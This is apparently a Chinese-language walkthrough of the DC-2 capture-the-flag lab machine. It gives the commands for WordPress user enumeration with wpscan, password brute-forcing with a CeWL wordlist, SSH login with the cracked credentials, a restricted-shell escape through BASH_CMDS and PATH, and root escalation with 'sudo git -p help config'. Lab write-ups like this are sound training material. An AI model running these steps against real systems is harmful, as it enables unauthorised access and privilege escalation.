信息收集
1.查看靶机mac地址并修改它的网络连接模式
2.主机发现
3.端口扫描
4.访问80端口
5.发现他出现一个域名,hosts文件绑定
6.重新访问
7.访问成功,查看主页上信息发现flag
8.发现是wordpress cms
9.whatweb 扫描
10.目录扫描
11.拼接/wp-admin
12.使⽤wpscan⼯具枚举⽤户
13.发现了三个相关的用户名admin,jerry,tom 接下来就是密码,使用了Cewl工具
cewl http://dc-2/ > 1.txt
14.破解密码
wpscan --url http://dc-2 --passwords 1.txt
15.获得账户密码
Username: jerry, Password: adipiscing Username: tom, Password: parturient
16.进行登录
17.发现第二个flag
18.根据提示连接ssh
ssh tom@192.168.42.190 -p 7744
parturient
19.成功连接
提权
1.查看权限
2.发现有限制。有一些命令不能使用,发现echo命令export命令可以使用,使用echo命令查看一下系统命令还有啥能用。
echo $PATH
echo /home/tom/usr/bin/*
3.使用上图命令进行绕过
# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a
# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
4.发现可以执行命令了,查看目录
5.根据提示切换jerry用户并查找flag文件
find / -name *flag*
6.发现了falg4.txt,打开查看(在/home/jerry/)
7.使用sudo提权
9.输入
sudo git -p help config
!/bin/sh
10.发现成功提权